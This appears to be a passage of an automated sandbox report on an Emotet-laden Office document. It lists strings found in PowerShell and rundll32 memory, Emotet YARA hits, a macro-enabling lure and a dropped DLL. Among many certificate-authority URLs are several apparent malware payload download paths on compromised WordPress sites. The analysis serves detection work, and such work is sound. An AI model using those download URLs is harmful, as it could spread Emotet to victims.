Source: powershell.exe, 00000005.00000003.2325986641.0000000001FA7000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000005.00000002.2326644631.0000000001F69000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000005.00000003.2325909543.000000001CFDE000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.infonotary.com/responder.cgi0V
Source: powershell.exe, 00000005.00000003.2325961794.000000001CFF5000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.pki.gva.es0
Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.sectigo.com0/
Source: powershell.exe, 00000005.00000002.2334569128.000000001CFEE000.00000004.00000001.sdmp String found in binary or memory: http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0
Source: powershell.exe, 00000005.00000003.2325999069.000000001CFED000.00000004.00000001.sdmp String found in binary or memory: http://repository.infonotary.com/cps/qcps.html0$
Source: powershell.exe, 00000005.00000003.2325961794.000000001CFF5000.00000004.00000001.sdmp String found in binary or memory: http://repository.swisssign.com/0
Source: powershell.exe, 00000005.00000002.2326937839.00000000023D0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000005.00000002.2336945072.000000001D560000.00000002.00000001.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335520346.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331519355.0000000001FA7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2335196008.0000000001FA7000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2331518603.0000000003BB2000.00000004.00000001.sdmp String found in binary or memory: http://traumfrauen-ukraine.de
Source: powershell.exe, 00000005.00000002.2331398510.0000000003A86000.00000004.00000001.sdmp String found in binary or memory: http://traumfrauen-ukraine.de/bin/JyeS/
Source: powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335520346.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331519355.0000000001FA7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2335196008.0000000001FA7000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2326937839.00000000023D0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000005.00000003.2326005559.000000001CFFD000.00000004.00000001.sdmp String found in binary or memory: http://www.a-cert.at/certificate-policy.html0
Source: powershell.exe, 00000005.00000003.2326005559.000000001CFFD000.00000004.00000001.sdmp String found in binary or memory: http://www.a-cert.at/certificate-policy.html0;
Source: powershell.exe, 00000005.00000003.2326005559.000000001CFFD000.00000004.00000001.sdmp String found in binary or memory: http://www.a-cert.at0E
Source: powershell.exe, 00000005.00000003.2325909543.000000001CFDE000.00000004.00000001.sdmp String found in binary or memory: http://www.acabogacia.org/doc0
Source: powershell.exe, 00000005.00000003.2325909543.000000001CFDE000.00000004.00000001.sdmp String found in binary or memory: http://www.acabogacia.org0
Source: powershell.exe, 00000005.00000003.2325961794.000000001CFF5000.00000004.00000001.sdmp String found in binary or memory: http://www.ancert.com/cps0
Source: powershell.exe, 00000005.00000003.2325955165.000000001CFD4000.00000004.00000001.sdmp String found in binary or memory: http://www.certicamara.com/certicamaraca.crl0
Source: powershell.exe, 00000005.00000003.2325955165.000000001CFD4000.00000004.00000001.sdmp String found in binary or memory: http://www.certicamara.com/certicamaraca.crl0;
Source: powershell.exe, 00000005.00000003.2325999069.000000001CFED000.00000004.00000001.sdmp String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: powershell.exe, 00000005.00000002.2334418584.000000001CF9B000.00000004.00000001.sdmp String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0
Source: powershell.exe, 00000005.00000003.2325955165.000000001CFD4000.00000004.00000001.sdmp String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0
Source: powershell.exe, 00000005.00000003.2325955165.000000001CFD4000.00000004.00000001.sdmp String found in binary or memory: http://www.certifikat.dk/repository0
Source: powershell.exe, 00000005.00000003.2325975821.000000001D133000.00000004.00000001.sdmp String found in binary or memory: http://www.certplus.com/CRL/class1.crl0
Source: powershell.exe, 00000005.00000003.2325947854.000000001D025000.00000004.00000001.sdmp String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: powershell.exe, 00000005.00000003.2325975821.000000001D133000.00000004.00000001.sdmp String found in binary or memory: http://www.certplus.com/CRL/class3.crl0
Source: powershell.exe, 00000005.00000002.2334351202.000000001CF80000.00000004.00000001.sdmp String found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmp String found in binary or memory: http://www.chambersign.org1
Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmp String found in binary or memory: http://www.comsign.co.il/cps0
Source: powershell.exe, 00000005.00000003.2325999069.000000001CFED000.00000004.00000001.sdmp String found in binary or memory: http://www.crc.bg0
Source: powershell.exe, 00000005.00000002.2326644631.0000000001F69000.00000004.00000001.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000005.00000003.2325986641.0000000001FA7000.00000004.00000001.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000005.00000003.2325975821.000000001D133000.00000004.00000001.sdmp String found in binary or memory: http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0
Source: powershell.exe, 00000005.00000002.2334418584.000000001CF9B000.00000004.00000001.sdmp String found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
Source: powershell.exe, 00000005.00000002.2334418584.000000001CF9B000.00000004.00000001.sdmp String found in binary or memory: http://www.disig.sk/ca0f
Source: powershell.exe, 00000005.00000002.2334509027.000000001CFD8000.00000004.00000001.sdmp String found in binary or memory: http://www.dnie.es/dpc0
Source: powershell.exe, 00000005.00000002.2334569128.000000001CFEE000.00000004.00000001.sdmp String found in binary or memory: http://www.e-certchile.cl/html/productos/download/CPSv1.7.pdf01
Source: powershell.exe, 00000005.00000003.2325909543.000000001CFDE000.00000004.00000001.sdmp String found in binary or memory: http://www.e-me.lv/repository0
Source: powershell.exe, 00000005.00000002.2334509027.000000001CFD8000.00000004.00000001.sdmp String found in binary or memory: http://www.e-szigno.hu/RootCA.crl
Source: powershell.exe, 00000005.00000002.2334509027.000000001CFD8000.00000004.00000001.sdmp String found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
Source: powershell.exe, 00000005.00000002.2334509027.000000001CFD8000.00000004.00000001.sdmp String found in binary or memory: http://www.e-szigno.hu/SZSZ/0
Source: powershell.exe, 00000005.00000003.2325961794.000000001CFF5000.00000004.00000001.sdmp String found in binary or memory: http://www.e-trust.be/CPS/QNcerts
Source: powershell.exe, 00000005.00000003.2326005559.000000001CFFD000.00000004.00000001.sdmp String found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmp String found in binary or memory: http://www.entrust.net/CRL/Client1.crl0
Source: powershell.exe, 00000005.00000003.2325947854.000000001D025000.00000004.00000001.sdmp String found in binary or memory: http://www.entrust.net/CRL/net1.crl0
Source: powershell.exe, 00000005.00000002.2326313954.0000000000182000.00000004.00000020.sdmp String found in binary or memory: http://www.firmaprofesional.com0
Source: powershell.exe, 00000005.00000002.2326325895.00000000001A1000.00000004.00000020.sdmp String found in binary or memory: http://www.globaltrust.info0
Source: powershell.exe, 00000005.00000002.2326325895.00000000001A1000.00000004.00000020.sdmp String found in binary or memory: http://www.globaltrust.info0=
Source: powershell.exe, 00000005.00000002.2334898273.000000001D180000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335074733.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331258105.0000000001DC0000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: powershell.exe, 00000005.00000002.2335494858.000000001D367000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335520346.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331519355.0000000001FA7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2335196008.0000000001FA7000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: powershell.exe, 00000005.00000003.2325999069.000000001CFED000.00000004.00000001.sdmp String found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
Source: powershell.exe, 00000005.00000002.2334898273.000000001D180000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335074733.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331258105.0000000001DC0000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000003.2326018353.000000001CFE9000.00000004.00000001.sdmp String found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
Source: powershell.exe, 00000005.00000003.2325961794.000000001CFF5000.00000004.00000001.sdmp String found in binary or memory: http://www.pki.gva.es/cps0
Source: powershell.exe, 00000005.00000003.2325961794.000000001CFF5000.00000004.00000001.sdmp String found in binary or memory: http://www.pki.gva.es/cps0%
Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmp, powershell.exe, 00000005.00000003.2325999069.000000001CFED000.00000004.00000001.sdmp String found in binary or memory: http://www.post.trust.ie/reposit/cps.html0
Source: powershell.exe, 00000005.00000002.2334740754.000000001D058000.00000004.00000001.sdmp String found in binary or memory: http://www.quovadis.bm0
Source: powershell.exe, 00000005.00000002.2334509027.000000001CFD8000.00000004.00000001.sdmp String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: powershell.exe, 00000005.00000002.2334740754.000000001D058000.00000004.00000001.sdmp String found in binary or memory: http://www.registradores.org/scr/normativa/cp_f2.htm0
Source: powershell.exe, 00000005.00000003.2325955165.000000001CFD4000.00000004.00000001.sdmp String found in binary or memory: http://www.rootca.or.kr/rca/cps.html0
Source: powershell.exe, 00000005.00000002.2334740754.000000001D058000.00000004.00000001.sdmp String found in binary or memory: http://www.signatur.rtr.at/current.crl0
Source: powershell.exe, 00000005.00000002.2334740754.000000001D058000.00000004.00000001.sdmp String found in binary or memory: http://www.signatur.rtr.at/de/directory/cps.html0
Source: powershell.exe, 00000005.00000002.2334526019.000000001CFE3000.00000004.00000001.sdmp String found in binary or memory: http://www.ssc.lt/cps03
Source: powershell.exe, 00000005.00000003.2325909543.000000001CFDE000.00000004.00000001.sdmp String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl
Source: powershell.exe, 00000005.00000003.2325961794.000000001CFF5000.00000004.00000001.sdmp String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmp String found in binary or memory: http://www.trustcenter.de/guidelines0
Source: powershell.exe, 00000005.00000002.2334418584.000000001CF9B000.00000004.00000001.sdmp String found in binary or memory: http://www.trustdst.com/certificates/policy/ACES-index.html0
Source: powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmp String found in binary or memory: http://www.valicert.
Source: powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmp String found in binary or memory: http://www.valicert.1
Source: powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmp String found in binary or memory: http://www.valicert.com/1
Source: powershell.exe, 00000005.00000003.2325980100.000000001CFC9000.00000004.00000001.sdmp String found in binary or memory: http://www.wellsfargo.com/certpolicy0
Source: rundll32.exe, 00000008.00000002.2334588090.0000000001DC0000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2326597229.0000000001ECE000.00000004.00000001.sdmp String found in binary or memory: https://ca.sia.it/seccli/repository/CPS0
Source: powershell.exe, 00000005.00000003.2325975821.000000001D133000.00000004.00000001.sdmp String found in binary or memory: https://ca.sia.it/secsrv/repository/CPS0
Source: powershell.exe, 00000005.00000002.2331518603.0000000003BB2000.00000004.00000001.sdmp String found in binary or memory: https://jflmktg.wpcomstaging.com
Source: powershell.exe, 00000005.00000002.2331398510.0000000003A86000.00000004.00000001.sdmp String found in binary or memory: https://jflmktg.wpcomstaging.com/wp-content/AK/
Source: powershell.exe, 00000005.00000002.2331398510.0000000003A86000.00000004.00000001.sdmp String found in binary or memory: https://linhkienmaytinh.tctedu.com/wp-snapshots/VzJM/
Source: powershell.exe, 00000005.00000002.2334740754.000000001D058000.00000004.00000001.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: powershell.exe, 00000005.00000002.2334509027.000000001CFD8000.00000004.00000001.sdmp String found in binary or memory: https://rca.e-szigno.hu/ocsp0-
Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: powershell.exe, 00000005.00000003.2326005559.000000001CFFD000.00000004.00000001.sdmp String found in binary or memory: https://secure.a-cert.at/cgi-bin/a-cert-advanced.cgi0
Source: powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 00000005.00000002.2331489213.0000000003B6A000.00000004.00000001.sdmp String found in binary or memory: https://shop.nowfal.dev
Source: powershell.exe, 00000005.00000002.2331398510.0000000003A86000.00000004.00000001.sdmp String found in binary or memory: https://shop.nowfal.dev/wp-includes/RlMObf2j0/
Source: powershell.exe, 00000005.00000002.2331518603.0000000003BB2000.00000004.00000001.sdmp String found in binary or memory: https://traumfrauen-ukraine.de
Source: powershell.exe, 00000005.00000002.2331518603.0000000003BB2000.00000004.00000001.sdmp String found in binary or memory: https://traumfrauen-ukraine.de/bin/JyeS/
Source: powershell.exe, 00000005.00000003.2326005559.000000001CFFD000.00000004.00000001.sdmp String found in binary or memory: https://www.catcert.net/verarrel
Source: powershell.exe, 00000005.00000003.2326005559.000000001CFFD000.00000004.00000001.sdmp String found in binary or memory: https://www.catcert.net/verarrel05
Source: powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmp String found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
Source: powershell.exe, 00000005.00000002.2326612864.0000000001EFD000.00000004.00000001.sdmp String found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E
Source: powershell.exe, 00000005.00000002.2326655007.0000000001F82000.00000004.00000001.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: powershell.exe, 00000005.00000003.2325955165.000000001CFD4000.00000004.00000001.sdmp String found in binary or memory: https://www.netlock.hu/docs/
Source: powershell.exe, 00000005.00000003.2325975821.000000001D133000.00000004.00000001.sdmp String found in binary or memory: https://www.netlock.net/docs
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49166 -> 443

E-Banking Fraud:

barindex
Yara detected Emotet
Source: Yara match File source: 00000016.00000002.2368006651.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2369643612.0000000000180000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2342398831.00000000001E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2339483010.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2335393724.0000000000280000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2352976974.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.2363852482.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2370162675.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2333967935.0000000000280000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2342378229.0000000000160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2334066475.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2347071363.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2485894589.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.2368454329.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2335519485.0000000000340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2351415450.0000000000750000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2358322887.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2370274121.0000000000550000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2486292831.0000000002010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2355550940.00000000006E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2343974004.00000000004A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2368531156.0000000000450000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2360129710.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2338149952.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2343885574.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2338282736.00000000002B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2359551824.0000000000460000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.2364687136.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2355569966.0000000000750000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2352906309.0000000000160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2351067576.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2333875086.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2355670534.0000000000930000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2342497051.0000000000280000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2367980145.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2338123179.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2335352749.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2339586653.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2346880947.00000000001B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2330883211.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2339441337.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2485863461.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2347031079.0000000000280000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2348536550.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2360111276.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2358696763.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2360228021.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2352930564.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2351291099.00000000006B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2348563781.00000000002F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2343843229.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2348503069.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 20.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.750000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.430000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.930000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.6b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.rundll32.exe.550000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.280000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.280000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.280000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.930000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.4a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.rundll32.exe.2010000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.rundll32.exe.450000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.4a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.rundll32.exe.2010000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.6b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.280000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.460000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.280000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.430000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.750000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.rundll32.exe.450000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.280000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.460000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.280000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.280000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.rundll32.exe.550000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable Editing and Enable Content. 0 Page, I of I Words: 8,746 ,9 N@m 13 ;a 10096 G) FI G)
Source: Screenshot number: 4 Screenshot OCR: Enable Content. 0 Page, I of I Words: 8,746 ,9 N@m 13 ;a 10096 G) FI G) ,, . ZE iss ,,gS
Source: Screenshot number: 8 Screenshot OCR: Enable Editing and Enable Content. a nmmm O I @ 100% G) A GE)
Source: Screenshot number: 8 Screenshot OCR: Enable Content. a nmmm O I @ 100% G) A GE)
Source: Document image extraction number: 0 Screenshot OCR: Enable Editing and Enable Content.
Source: Document image extraction number: 0 Screenshot OCR: Enable Content.
Source: Document image extraction number: 1 Screenshot OCR: Enable Editing and Enable Content.
Source: Document image extraction number: 1 Screenshot OCR: Enable Content.
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll Jump to dropped file
Very long command line found
Source: unknown Process created: Commandline size = 5669
Source: unknown Process created: Commandline size = 5568
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 5568 Jump to behavior
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
